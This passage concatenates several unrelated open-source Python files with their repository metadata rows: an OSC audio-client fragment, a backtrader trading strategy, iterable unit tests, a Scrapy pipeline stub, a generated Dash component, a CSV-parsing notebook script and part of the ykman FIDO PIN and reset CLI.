# dbundle.append({'addr':"/smile", 'args': ["/sfopenpath", sfopenpath ]})
# if sfrecpath!='':
# dbundle.append({'addr':"/smile", 'args': ["/sfrecpath", sfrecpath ]})
self.client.send(dbundle)
def ZigSfRecIter(self):
dbundle = OSC.OSCBundle()
dbundle.append({'addr':"/miconoff", 'args':0})
# dbundle.append({'addr':"/sffoldername", 'args':sffoldername})
dbundle.append({'addr':"/sfrec", 'args':1})
self.client.send(dbundle)
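# Minimal usage sketch (illustrative only, not part of the original module):
# it assumes a DAVID/Max patch is listening on the local machine with the
# default ports hard-coded above (5678 out, 5681 in).
if __name__ == "__main__":
    david = pydavid("127.0.0.1")
    david.connect()      # open the OSC client and start the receiving server thread
    david.ping()         # send a /ping message to check the link
    david.MicPreset(2)   # enable the microphone and switch to preset 2
    david.disconnect()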
| 39.59596 | 187 | 0.589626 |
| cc356e0300f23dd55abdd82bb139e1457732490a | 4,213 | py | Python | Storage/q_pack/q_strategies/simple_strategy_2.py | Alba-Intelligence/Microservices-Based-Algorithmic-Trading-System | 78a2b8d485a799fe5759f024b202355e94aeeb10 | ["BSD-3-Clause"] | 207 | 2020-01-09T14:07:47.000Z | 2022-03-24T00:04:37.000Z | Storage/q_pack/q_strategies/simple_strategy_2.py | snorics/Microservices-Based-Algorithmic-Trading-System | 454b6fb679c1b59a2f7e3aac7b2167901c9b4f2d | ["BSD-3-Clause"] | 9 | 2020-02-11T14:10:27.000Z | 2021-11-10T11:42:04.000Z | Storage/q_pack/q_strategies/simple_strategy_2.py | snorics/Microservices-Based-Algorithmic-Trading-System | 454b6fb679c1b59a2f7e3aac7b2167901c9b4f2d | ["BSD-3-Clause"] | 92 | 2020-01-10T01:23:37.000Z | 2022-03-21T19:23:10.000Z |
import backtrader as bt
import backtrader.indicators as btind
import datetime
import psycopg2
import pandas as pd
import os
import mlflow.pyfunc
class St(bt.Strategy):
alias = 'Simple Strategy'
params = dict(
period=10,
limdays=200,
backtest=True,
ml_serving=False,
model_uri="24cbdab283244fac8d54405d58b2bbf1"
)
def log(self, arg):
if not self.p.backtest:
print('{} {}'.format(self.datetime.datetime(), arg))
def __init__(self):
self.db_run_id = None
self.rsi = [bt.indicators.RSI(d, period=30) for d in self.datas]
self.stoc = [bt.indicators.Stochastic(d, period=20) for d in self.datas]
self.atr = [bt.indicators.ATR(d, period=5) for d in self.datas]
for i in self.rsi:
i.aliased='RSI'
for i in self.stoc:
i.aliased='STOCHASTIC'
for i in self.atr:
i.aliased='ATR'
self.order = None
self.buyprice = None
self.buycomm = None
# if arg:
if self.p.backtest:
self.datastatus = 1
else:
self.datastatus = 0
if self.p.ml_serving:
print("s3://mlflow-models/"+self.p.model_uri+"/artifacts/model")
self.model_predict=mlflow.pyfunc.load_model(model_uri=("s3://mlflow-models/"+self.p.model_uri+"/artifacts/model"))
def notify_data(self, data, status, *args, **kwargs):
print('*' * 5, 'DATA NOTIF:', data._getstatusname(status), *args)
if status == data.LIVE:
self.datastatus = 1
def notify_order(self, order):
if (order.status>1): # 0 and 1 are created and submitted
self.log('Order Status: {}: Ref: {}, Size: {}, Price: {}' \
.format(order.Status[order.status], order.ref, order.size,
'NA' if not order.price else round(order.price,5)))
def notify_trade(self, trade):
if not trade.isclosed:
return
self.log('OPERATION PROFIT, GROSS %.5f, NET %.2f' %
(trade.pnl, trade.pnlcomm))
def next(self):
for i, d in enumerate(self.datas):
dt, dn = self.datetime.datetime(), d._name
pos = self.getposition(d).size
order_valid = datetime.timedelta(self.p.limdays)
if self.datastatus and pos==0:
if self.p.ml_serving:
pred=self.model_predict.predict([[self.rsi[i][0],self.stoc[i][0]]])[0]
if pred>0:
                        # ATR-based stop-loss / take-profit around the current close.
                        price_sl = d.close[0] - (self.atr[i][0] * 1)
                        price_tp = d.close[0] + (self.atr[i][0] * 2)
self.order=self.buy_bracket(data=d,exectype=bt.Order.Market , stopprice=price_sl, limitprice=price_tp, valid=order_valid) #, valid=order_valid,price=None
self.log('BUY CREATE {:.2f} at {}'.format(d.close[0],dn))
elif pred<=0:
                        price_sl = d.close[0] + (self.atr[i][0] * 1)
                        price_tp = d.close[0] - (self.atr[i][0] * 2)
self.order=self.sell_bracket(data=d,exectype=bt.Order.Market, stopprice=price_sl, limitprice=price_tp, valid=order_valid)
self.log('SELL CREATE {:.2f} at {}'.format(d.close[0],dn))
elif self.rsi[i] < 40:
                    # ATR-based stop-loss / take-profit for the RSI long entry.
                    price_sl = d.close[0] - (self.atr[i][0] * 1)
                    price_tp = d.close[0] + (self.atr[i][0] * 2)
self.order=self.buy_bracket(data=d,exectype=bt.Order.Market , stopprice=price_sl, limitprice=price_tp, valid=order_valid) #, valid=order_valid,price=None
self.log('BUY CREATE {:.2f} at {}'.format(d.close[0],dn))
elif self.rsi[i] > 60:
                    price_sl = d.close[0] + (self.atr[i][0] * 1)
                    price_tp = d.close[0] - (self.atr[i][0] * 2)
self.order=self.sell_bracket(data=d,exectype=bt.Order.Market, stopprice=price_sl, limitprice=price_tp, valid=order_valid)
self.log('SELL CREATE {:.2f} at {}'.format(d.close[0],dn))
def stop(self):
print("Strategy run finished with Run ID:",self.db_run_id)
| 39.745283 | 177 | 0.552575 |
| 95a5af4a3e6c1414bccfe4cb7269f01d2219e7da | 3,714 | py | Python | tests/test_iterable.py | deeprave/pylib | 53ec7e922c8474c08f62068361b5529ac0a21e6a | ["Apache-2.0"] | null | null | null | tests/test_iterable.py | deeprave/pylib | 53ec7e922c8474c08f62068361b5529ac0a21e6a | ["Apache-2.0"] | null | null | null | tests/test_iterable.py | deeprave/pylib | 53ec7e922c8474c08f62068361b5529ac0a21e6a | ["Apache-2.0"] | null | null | null |
# -*- coding: utf-8 -*-
from unittest import TestCase
from pylib.iterable import is_iterable, iterable
class Counter(object):
"""
Sample iterable class
"""
def __init__(self, low=1, high=10):
self.current = self.low = low
self.high = high
def __next__(self):
if self.current > self.high:
raise StopIteration
self.current += 1
return self.current - 1
def next(self):
return self.__next__()
def __iter__(self):
return self
def generator(start_value, multiplier):
value = start_value
while True:
yield value
value *= multiplier
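# Quick illustration of the two sample iterables above (comments only, so the
# module's import-time behaviour is unchanged):
#
#     list(Counter(1, 3))                         # -> [1, 2, 3]
#     list(itertools.islice(generator(1, 2), 4))  # -> [1, 2, 4, 8]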
# noinspection SpellCheckingInspection
class TestIsIterable(TestCase):
def test_list_isiterable(self):
self.assertTrue(is_iterable([]))
self.assertTrue(is_iterable([1, 3, 4]))
my_list = [1, 'two', 'FIVE', 9]
self.assertTrue(is_iterable(my_list))
def test_iter_isiterable(self):
self.assertTrue(is_iterable([]))
my_list_iterator = iter([1, 'two', 'FIVE', 9])
self.assertTrue(is_iterable(my_list_iterator))
def test_dict_isiterable(self):
self.assertTrue(is_iterable({}))
self.assertTrue(is_iterable({'one': 1, 2: 'two', 'three': 'third'}))
my_dict = {1: 'one', 'two': 2, 'third': 'three'}
self.assertTrue(is_iterable(my_dict))
def test_bytes_isNOTiterable(self):
self.assertFalse(is_iterable(b''))
self.assertFalse(is_iterable(b'1234567890abcdefg'))
def test_str_isNOTiterable(self):
        self.assertFalse(is_iterable(''))
        self.assertFalse(is_iterable('1234567890abcdefg'))
def test_raw_string_isNOTiterable(self):
self.assertFalse(is_iterable(r''))
self.assertFalse(is_iterable(r'\rthis is a raw string\n'))
def test_iterable_is_iterable(self):
counter = Counter()
self.assertTrue(is_iterable(counter))
def test_generator_is_iterable(self):
gen_func = generator(1, 2)
self.assertTrue(is_iterable(gen_func))
class TestIterable(TestCase):
def test_make_str_iterable(self):
test_string = 'test string'
test_strings = iterable(test_string)
self.assertTrue(is_iterable(test_strings))
self.assertIn(test_string, test_strings)
def test_make_bytes_iterable(self):
test_bytes = b'test string'
test_bytes_list = iterable(test_bytes)
self.assertTrue(is_iterable(test_bytes_list))
self.assertIn(test_bytes, test_bytes_list)
def test_make_numeric_iterable(self):
test_numeric = 1234
test_numeric_list = iterable(test_numeric)
self.assertTrue(is_iterable(test_numeric_list))
self.assertIn(test_numeric, test_numeric_list)
def test_make_floats_iterable(self):
test_numeric = 1234.056789
test_numeric_list = iterable(test_numeric)
self.assertTrue(is_iterable(test_numeric_list))
self.assertIn(test_numeric, test_numeric_list)
def test_list_is_already_iterable(self):
test_list = ['one', 2, 'three', 'four', 5]
self.assertTrue(is_iterable(test_list))
test_list2 = iterable(test_list)
self.assertTrue(is_iterable(test_list2))
self.assertListEqual(test_list, test_list2)
self.assertEqual(test_list, test_list2)
def test_dict_is_already_iterable(self):
test_dict = {'one': 1, 2: 'two', 'three': 3, 'four': 4, 5: 'five'}
self.assertTrue(is_iterable(test_dict))
test_dict2 = iterable(test_dict)
self.assertTrue(is_iterable(test_dict2))
self.assertDictEqual(test_dict, test_dict2)
self.assertEqual(test_dict, test_dict2)
| 31.74359 | 76 | 0.667205 |
| 34b9d26fcbdcac80ee8e6db2f9c68ba497124e8f | 293 | py | Python | selenium_demo/selenium_demo/pipelines.py | zhaohandd/Web_Crawler | b4ccbcce95fd1c037d1c8a6ae9b269eeb9928440 | ["Apache-2.0"] | 3 | 2018-10-18T14:50:24.000Z | 2021-12-30T08:45:33.000Z | selenium_demo/selenium_demo/pipelines.py | zhaohandd/Web_Crawler | b4ccbcce95fd1c037d1c8a6ae9b269eeb9928440 | ["Apache-2.0"] | null | null | null | selenium_demo/selenium_demo/pipelines.py | zhaohandd/Web_Crawler | b4ccbcce95fd1c037d1c8a6ae9b269eeb9928440 | ["Apache-2.0"] | 3 | 2019-04-27T15:11:49.000Z | 2021-09-06T04:47:05.000Z |
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
class SeleniumDemoPipeline(object):
def process_item(self, item, spider):
return item
| 24.416667 | 65 | 0.716724 |
| b48c82f0ebff24f95108b3e605b6957030ba99aa | 4,788 | py | Python | Project_Code/venv/lib/python3.7/site-packages/dash_html_components/Nextid.py | iataylor15/Non-hashed-Password-Cracker | c0c407bcbad403e0232ce20a109076e7a452695d | ["MIT"] | 2 | 2020-04-11T19:28:30.000Z | 2020-05-04T03:16:20.000Z | venv/lib/python3.7/site-packages/dash_html_components/Nextid.py | thaiscaldeira/ccinsight | 94efc5d68234950687d13151b8878bbdeef53eb3 | ["BSD-3-Clause"] | null | null | null | venv/lib/python3.7/site-packages/dash_html_components/Nextid.py | thaiscaldeira/ccinsight | 94efc5d68234950687d13151b8878bbdeef53eb3 | ["BSD-3-Clause"] | 1 | 2022-03-22T18:23:06.000Z | 2022-03-22T18:23:06.000Z |
# AUTO GENERATED FILE - DO NOT EDIT
from dash.development.base_component import Component, _explicitize_args
class Nextid(Component):
"""A Nextid component.
Nextid is a wrapper for the <nextid> HTML5 element.
For detailed attribute info see:
https://developer.mozilla.org/en-US/docs/Web/HTML/Element/nextid
Keyword arguments:
- children (a list of or a singular dash component, string or number; optional): The children of this component
- id (string; optional): The ID of this component, used to identify dash components
in callbacks. The ID needs to be unique across all of the
components in an app.
- n_clicks (number; default 0): An integer that represents the number of times
that this element has been clicked on.
- n_clicks_timestamp (number; default -1): An integer that represents the time (in ms since 1970)
at which n_clicks changed. This can be used to tell
which button was changed most recently.
- key (string; optional): A unique identifier for the component, used to improve
performance by React.js while rendering components
See https://reactjs.org/docs/lists-and-keys.html for more info
- role (string; optional): The ARIA role attribute
- data-* (string; optional): A wildcard data attribute
- aria-* (string; optional): A wildcard aria attribute
- accessKey (string; optional): Keyboard shortcut to activate or add focus to the element.
- className (string; optional): Often used with CSS to style elements with common properties.
- contentEditable (string; optional): Indicates whether the element's content is editable.
- contextMenu (string; optional): Defines the ID of a <menu> element which will serve as the element's context menu.
- dir (string; optional): Defines the text direction. Allowed values are ltr (Left-To-Right) or rtl (Right-To-Left)
- draggable (string; optional): Defines whether the element can be dragged.
- hidden (a value equal to: 'hidden', 'HIDDEN' | boolean; optional): Prevents rendering of given element, while keeping child elements, e.g. script elements, active.
- lang (string; optional): Defines the language used in the element.
- spellCheck (string; optional): Indicates whether spell checking is allowed for the element.
- style (dict; optional): Defines CSS styles which will override styles previously set.
- tabIndex (string; optional): Overrides the browser's default tab order and follows the one specified instead.
- title (string; optional): Text to be displayed in a tooltip when hovering over the element.
- loading_state (dict; optional): Object that holds the loading state object coming from dash-renderer. loading_state has the following type: dict containing keys 'is_loading', 'prop_name', 'component_name'.
Those keys have the following types:
- is_loading (boolean; optional): Determines if the component is loading or not
- prop_name (string; optional): Holds which property is loading
- component_name (string; optional): Holds the name of the component that is loading"""
@_explicitize_args
def __init__(self, children=None, id=Component.UNDEFINED, n_clicks=Component.UNDEFINED, n_clicks_timestamp=Component.UNDEFINED, key=Component.UNDEFINED, role=Component.UNDEFINED, accessKey=Component.UNDEFINED, className=Component.UNDEFINED, contentEditable=Component.UNDEFINED, contextMenu=Component.UNDEFINED, dir=Component.UNDEFINED, draggable=Component.UNDEFINED, hidden=Component.UNDEFINED, lang=Component.UNDEFINED, spellCheck=Component.UNDEFINED, style=Component.UNDEFINED, tabIndex=Component.UNDEFINED, title=Component.UNDEFINED, loading_state=Component.UNDEFINED, **kwargs):
self._prop_names = ['children', 'id', 'n_clicks', 'n_clicks_timestamp', 'key', 'role', 'data-*', 'aria-*', 'accessKey', 'className', 'contentEditable', 'contextMenu', 'dir', 'draggable', 'hidden', 'lang', 'spellCheck', 'style', 'tabIndex', 'title', 'loading_state']
self._type = 'Nextid'
self._namespace = 'dash_html_components'
self._valid_wildcard_attributes = ['data-', 'aria-']
self.available_properties = ['children', 'id', 'n_clicks', 'n_clicks_timestamp', 'key', 'role', 'data-*', 'aria-*', 'accessKey', 'className', 'contentEditable', 'contextMenu', 'dir', 'draggable', 'hidden', 'lang', 'spellCheck', 'style', 'tabIndex', 'title', 'loading_state']
self.available_wildcard_properties = ['data-', 'aria-']
_explicit_args = kwargs.pop('_explicit_args')
_locals = locals()
_locals.update(kwargs) # For wildcard attrs
args = {k: _locals[k] for k in _explicit_args if k != 'children'}
for k in []:
if k not in args:
raise TypeError(
'Required argument `' + k + '` was not specified.')
super(Nextid, self).__init__(children=children, **args)
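# Illustrative usage sketch (an assumption, not part of the auto-generated
# component file): the wrapper is instantiated like any other Dash HTML
# component and handed to a layout.
if __name__ == '__main__':  # pragma: no cover
    import dash
    app = dash.Dash(__name__)
    # <nextid> is an obsolete HTML element, so this only demonstrates how the
    # generated class plugs into a Dash layout.
    app.layout = Nextid(id='nextid-demo', children='nextid demo')
    app.run_server(debug=True)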
| 74.8125 | 586 | 0.737886 |
| b385e4a4faa1e2f81cd2d665b197ea81d1d98ad3 | 1,719 | py | Python | Step_1_Introduction to Python/Python Programming_Beginner/py/4_Challenge_Files, Loops, and Conditional Logic.py | augustine0890/Data-Analyst | 97ec7c208818f3bb55c1ac8c3f1d4bd36570c0a2 | ["MIT"] | null | null | null | Step_1_Introduction to Python/Python Programming_Beginner/py/4_Challenge_Files, Loops, and Conditional Logic.py | augustine0890/Data-Analyst | 97ec7c208818f3bb55c1ac8c3f1d4bd36570c0a2 | ["MIT"] | null | null | null | Step_1_Introduction to Python/Python Programming_Beginner/py/4_Challenge_Files, Loops, and Conditional Logic.py | augustine0890/Data-Analyst | 97ec7c208818f3bb55c1ac8c3f1d4bd36570c0a2 | ["MIT"] | null | null | null |
# coding: utf-8
# In[1]:
import pandas as pd
# __Unisex Names__<br>
# - Read the File into a String
# In[2]:
r = open('dq_unisex_names.csv', 'r')
# In[3]:
names = r.read()
# __Convert the string to a list__
# Use the `split()` method that _strings_ have to split on the new-line delimiter (`"\n"`), and assign the resulting _list_ to `names_list`.
# In[4]:
names_list = names.split('\n')
# Select the first five elements in `names_list`, and assign them to `first_five`.
# In[5]:
first_five = names_list[:5]
# In[6]:
first_five
# __Convert the List of Strings to a List of Lists__<br>
# - Split each element in `names_list` on the comma delimiter (`,`) and append the resulting list to `nested_list`.
# In[7]:
nested_list = []
for value in names_list:
comma_list = value.split(',')
nested_list.append(comma_list)
nested_list[0:5]
# __Convert Numerical Values__<br>
# Create a new list of lists called `numerical_list` where:
#
# - The element at index `0` for each list is the unisex name (as a string)
# - The element at index `1` for each list is the number of people who share that name (as a float)
# In[8]:
numerical_list = []
for value in nested_list:
strings = value[0]
floats = float(value[1])
new_list = [strings,floats]
numerical_list.append(new_list)
numerical_list[:5]
# __Filter the List__<br>
# Create a new list of strings called `thousand_or_greater` that only contains the names shared by 1,000 people or more.
# In[9]:
len(numerical_list)
# In[10]:
numerical_list[497]
# In[11]:
thousand_or_greater = []
for value in numerical_list:
if value[1] >= 1000:
thousand_or_greater.append(value)
thousand_or_greater[:5]
| 16.528846 | 140 | 0.685864 |
| 3f81aa05c5b7db63014b08e81240ff1babb5ac52 | 24,461 | py | Python | ykman/cli/fido.py | meeuw/yubikey-manager | 0e6fbaa73397ebc5f4488107d8ffa57159c8cc78 | ["BSD-2-Clause"] | null | null | null | ykman/cli/fido.py | meeuw/yubikey-manager | 0e6fbaa73397ebc5f4488107d8ffa57159c8cc78 | ["BSD-2-Clause"] | null | null | null | ykman/cli/fido.py | meeuw/yubikey-manager | 0e6fbaa73397ebc5f4488107d8ffa57159c8cc78 | ["BSD-2-Clause"] | null | null | null |
# Copyright (c) 2018 Yubico AB
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from fido2.ctap import CtapError
from fido2.ctap1 import ApduError
from fido2.ctap2 import (
Ctap2,
ClientPin,
CredentialManagement,
FPBioEnrollment,
CaptureError,
)
from fido2.pcsc import CtapPcscDevice
from yubikit.core.fido import FidoConnection
from yubikit.core.smartcard import SW
from time import sleep
from .util import (
click_postpone_execution,
click_prompt,
click_force_option,
ykman_group,
prompt_timeout,
)
from .util import cli_fail
from ..fido import is_in_fips_mode, fips_reset, fips_change_pin, fips_verify_pin
from ..hid import list_ctap_devices
from ..device import is_fips_version
from ..pcsc import list_devices as list_ccid
from smartcard.Exceptions import NoCardException, CardConnectionException
from typing import Optional
import click
import logging
logger = logging.getLogger(__name__)
FIPS_PIN_MIN_LENGTH = 6
PIN_MIN_LENGTH = 4
@ykman_group(FidoConnection)
@click.pass_context
@click_postpone_execution
def fido(ctx):
"""
Manage the FIDO applications.
Examples:
\b
Reset the FIDO (FIDO2 and U2F) applications:
$ ykman fido reset
\b
Change the FIDO2 PIN from 123456 to 654321:
$ ykman fido access change-pin --pin 123456 --new-pin 654321
"""
conn = ctx.obj["conn"]
try:
ctx.obj["ctap2"] = Ctap2(conn)
except (ValueError, CtapError) as e:
logger.info("FIDO device does not support CTAP2: %s", e)
@fido.command()
@click.pass_context
def info(ctx):
"""
Display general status of the FIDO2 application.
"""
conn = ctx.obj["conn"]
ctap2 = ctx.obj.get("ctap2")
if is_fips_version(ctx.obj["info"].version):
click.echo("FIPS Approved Mode: " + ("Yes" if is_in_fips_mode(conn) else "No"))
elif ctap2:
client_pin = ClientPin(ctap2) # N.B. All YubiKeys with CTAP2 support PIN.
if ctap2.info.options["clientPin"]:
if ctap2.info.force_pin_change:
click.echo(
"NOTE: The FIDO PID is disabled and must be changed before it can "
"be used!"
)
pin_retries, power_cycle = client_pin.get_pin_retries()
if pin_retries:
click.echo(f"PIN is set, with {pin_retries} attempt(s) remaining.")
if power_cycle:
click.echo(
"PIN is temporarily blocked. "
"Remove and re-insert the YubiKey to unblock."
)
else:
click.echo("PIN is set, but has been blocked.")
else:
click.echo("PIN is not set.")
bio_enroll = ctap2.info.options.get("bioEnroll")
if bio_enroll:
uv_retries, _ = client_pin.get_uv_retries()
if uv_retries:
click.echo(
f"Fingerprints registered, with {uv_retries} attempt(s) "
"remaining."
)
else:
click.echo(
"Fingerprints registered, but blocked until PIN is verified."
)
elif bio_enroll is False:
click.echo("No fingerprints have been registered.")
always_uv = ctap2.info.options.get("alwaysUv")
if always_uv is not None:
click.echo(
"Always Require User Verification is turned "
+ ("on." if always_uv else "off.")
)
else:
click.echo("PIN is not supported.")
@fido.command("reset")
@click_force_option
@click.pass_context
def reset(ctx, force):
"""
Reset all FIDO applications.
This action will wipe all FIDO credentials, including FIDO U2F credentials,
on the YubiKey and remove the PIN code.
The reset must be triggered immediately after the YubiKey is
inserted, and requires a touch on the YubiKey.
"""
conn = ctx.obj["conn"]
if isinstance(conn, CtapPcscDevice): # NFC
readers = list_ccid(conn._name)
if not readers or readers[0].reader.name != conn._name:
logger.error(f"Multiple readers matched: {readers}")
cli_fail("Unable to isolate NFC reader.")
dev = readers[0]
logger.debug(f"use: {dev}")
is_fips = False
def prompt_re_insert():
click.echo(
"Remove and re-place your YubiKey on the NFC reader to perform the "
"reset..."
)
removed = False
while True:
sleep(0.5)
try:
with dev.open_connection(FidoConnection):
if removed:
sleep(1.0) # Wait for the device to settle
break
except CardConnectionException:
pass # Expected, ignore
except NoCardException:
removed = True
return dev.open_connection(FidoConnection)
else: # USB
n_keys = len(list_ctap_devices())
if n_keys > 1:
cli_fail("Only one YubiKey can be connected to perform a reset.")
is_fips = is_fips_version(ctx.obj["info"].version)
ctap2 = ctx.obj.get("ctap2")
if not is_fips and not ctap2:
cli_fail("This YubiKey does not support FIDO reset.")
def prompt_re_insert():
click.echo("Remove and re-insert your YubiKey to perform the reset...")
removed = False
while True:
sleep(0.5)
keys = list_ctap_devices()
if not keys:
removed = True
if removed and len(keys) == 1:
return keys[0].open_connection(FidoConnection)
if not force:
if not click.confirm(
"WARNING! This will delete all FIDO credentials, including FIDO U2F "
"credentials, and restore factory settings. Proceed?",
err=True,
):
ctx.abort()
if is_fips:
destroy_input = click_prompt(
"WARNING! This is a YubiKey FIPS device. This command will also "
"overwrite the U2F attestation key; this action cannot be undone and "
"this YubiKey will no longer be a FIPS compliant device.\n"
'To proceed, please enter the text "OVERWRITE"',
default="",
show_default=False,
)
if destroy_input != "OVERWRITE":
cli_fail("Reset aborted by user.")
conn = prompt_re_insert()
try:
with prompt_timeout():
if is_fips:
fips_reset(conn)
else:
Ctap2(conn).reset()
except CtapError as e:
logger.error("Reset failed", exc_info=e)
if e.code == CtapError.ERR.ACTION_TIMEOUT:
cli_fail(
"Reset failed. You need to touch your YubiKey to confirm the reset."
)
elif e.code in (CtapError.ERR.NOT_ALLOWED, CtapError.ERR.PIN_AUTH_BLOCKED):
cli_fail(
"Reset failed. Reset must be triggered within 5 seconds after the "
"YubiKey is inserted."
)
else:
cli_fail(f"Reset failed: {e.code.name}")
except ApduError as e: # From fips_reset
logger.error("Reset failed", exc_info=e)
if e.code == SW.COMMAND_NOT_ALLOWED:
cli_fail(
"Reset failed. Reset must be triggered within 5 seconds after the "
"YubiKey is inserted."
)
else:
cli_fail("Reset failed.")
except Exception as e:
logger.error(e)
cli_fail("Reset failed.")
def _fail_pin_error(ctx, e, other="%s"):
if e.code == CtapError.ERR.PIN_INVALID:
cli_fail("Wrong PIN.")
elif e.code == CtapError.ERR.PIN_AUTH_BLOCKED:
cli_fail(
"PIN authentication is currently blocked. "
"Remove and re-insert the YubiKey."
)
elif e.code == CtapError.ERR.PIN_BLOCKED:
cli_fail("PIN is blocked.")
else:
cli_fail(other % e.code)
@fido.group("access")
def access():
"""
Manage the PIN for FIDO.
"""
@access.command("change-pin")
@click.pass_context
@click.option("-P", "--pin", help="Current PIN code.")
@click.option("-n", "--new-pin", help="A new PIN.")
@click.option(
"-u", "--u2f", is_flag=True, help="Set FIDO U2F PIN instead of FIDO2 PIN."
)
def change_pin(ctx, pin, new_pin, u2f):
"""
Set or change the PIN code.
The FIDO2 PIN must be at least 4 characters long, and supports any type
of alphanumeric characters.
On YubiKey FIPS, a PIN can be set for FIDO U2F. That PIN must be at least
6 characters long.
"""
is_fips = is_fips_version(ctx.obj["info"].version)
if is_fips and not u2f:
cli_fail("This is a YubiKey FIPS. To set the U2F PIN, pass the --u2f option.")
if u2f and not is_fips:
cli_fail(
"This is not a YubiKey FIPS, and therefore does not support a U2F PIN. "
"To set the FIDO2 PIN, remove the --u2f option."
)
if is_fips:
conn = ctx.obj["conn"]
else:
ctap2 = ctx.obj.get("ctap2")
if not ctap2:
cli_fail("PIN is not supported on this YubiKey.")
client_pin = ClientPin(ctap2)
def prompt_new_pin():
return click_prompt(
"Enter your new PIN",
default="",
hide_input=True,
show_default=False,
confirmation_prompt=True,
)
def change_pin(pin, new_pin):
if pin is not None:
_fail_if_not_valid_pin(ctx, pin, is_fips)
try:
if is_fips:
try:
# Failing this with empty current PIN does not cost a retry
fips_change_pin(conn, pin or "", new_pin)
except ApduError as e:
if e.code == SW.WRONG_LENGTH:
pin = _prompt_current_pin()
_fail_if_not_valid_pin(ctx, pin, is_fips)
fips_change_pin(conn, pin, new_pin)
else:
raise
else:
client_pin.change_pin(pin, new_pin)
except CtapError as e:
logger.error("Failed to change PIN", exc_info=e)
if e.code == CtapError.ERR.PIN_POLICY_VIOLATION:
cli_fail("New PIN doesn't meet policy requirements.")
else:
_fail_pin_error(ctx, e, "Failed to change PIN: %s")
except ApduError as e:
logger.error("Failed to change PIN", exc_info=e)
if e.code == SW.VERIFY_FAIL_NO_RETRY:
cli_fail("Wrong PIN.")
elif e.code == SW.AUTH_METHOD_BLOCKED:
cli_fail("PIN is blocked.")
else:
cli_fail(f"Failed to change PIN: SW={e.code:04x}")
def set_pin(new_pin):
_fail_if_not_valid_pin(ctx, new_pin, is_fips)
try:
client_pin.set_pin(new_pin)
except CtapError as e:
logger.error("Failed to set PIN", exc_info=e)
if e.code == CtapError.ERR.PIN_POLICY_VIOLATION:
cli_fail("PIN is too long.")
else:
cli_fail(f"Failed to set PIN: {e.code}")
if not is_fips:
if ctap2.info.options.get("clientPin"):
if not pin:
pin = _prompt_current_pin()
else:
if pin:
cli_fail("There is no current PIN set. Use --new-pin to set one.")
if not new_pin:
new_pin = prompt_new_pin()
if is_fips:
_fail_if_not_valid_pin(ctx, new_pin, is_fips)
change_pin(pin, new_pin)
else:
if len(new_pin) < ctap2.info.min_pin_length:
cli_fail("New PIN is too short.")
if ctap2.info.options.get("clientPin"):
change_pin(pin, new_pin)
else:
set_pin(new_pin)
def _require_pin(ctx, pin, feature="This feature"):
ctap2 = ctx.obj.get("ctap2")
if not ctap2:
cli_fail(f"{feature} is not supported on this YubiKey.")
if not ctap2.info.options.get("clientPin"):
cli_fail(f"{feature} requires having a PIN. Set a PIN first.")
if ctap2.info.force_pin_change:
cli_fail("The FIDO PIN is blocked. Change the PIN first.")
if pin is None:
pin = _prompt_current_pin(prompt="Enter your PIN")
return pin
@access.command("verify-pin")
@click.pass_context
@click.option("-P", "--pin", help="Current PIN code.")
def verify(ctx, pin):
"""
Verify the FIDO PIN against a YubiKey.
For YubiKeys supporting FIDO2 this will reset the "retries" counter of the PIN.
For YubiKey FIPS this will unlock the session, allowing U2F registration.
"""
ctap2 = ctx.obj.get("ctap2")
if ctap2:
pin = _require_pin(ctx, pin)
client_pin = ClientPin(ctap2)
try:
# Get a PIN token to verify the PIN.
client_pin.get_pin_token(
pin, ClientPin.PERMISSION.GET_ASSERTION, "ykman.example.com"
)
except CtapError as e:
logger.error("PIN verification failed", exc_info=e)
cli_fail(f"Error: {e}")
elif is_fips_version(ctx.obj["info"].version):
_fail_if_not_valid_pin(ctx, pin, True)
try:
fips_verify_pin(ctx.obj["conn"], pin)
except ApduError as e:
logger.error("PIN verification failed", exc_info=e)
if e.code == SW.VERIFY_FAIL_NO_RETRY:
cli_fail("Wrong PIN.")
elif e.code == SW.AUTH_METHOD_BLOCKED:
cli_fail("PIN is blocked.")
elif e.code == SW.COMMAND_NOT_ALLOWED:
cli_fail("PIN is not set.")
else:
cli_fail(f"PIN verification failed: {e.code.name}")
else:
cli_fail("This YubiKey does not support a FIDO PIN.")
click.echo("PIN verified.")
def _prompt_current_pin(prompt="Enter your current PIN"):
return click_prompt(prompt, default="", hide_input=True, show_default=False)
def _fail_if_not_valid_pin(ctx, pin=None, is_fips=False):
min_length = FIPS_PIN_MIN_LENGTH if is_fips else PIN_MIN_LENGTH
if not pin or len(pin) < min_length:
ctx.fail(f"PIN must be over {min_length} characters long")
def _gen_creds(credman):
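    # Yield (rp_id, credential_id, user_id, user_name) tuples for every discoverable
    # credential stored on the YubiKey.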
data = credman.get_metadata()
if data.get(CredentialManagement.RESULT.EXISTING_CRED_COUNT) == 0:
return # No credentials
for rp in credman.enumerate_rps():
for cred in credman.enumerate_creds(rp[CredentialManagement.RESULT.RP_ID_HASH]):
yield (
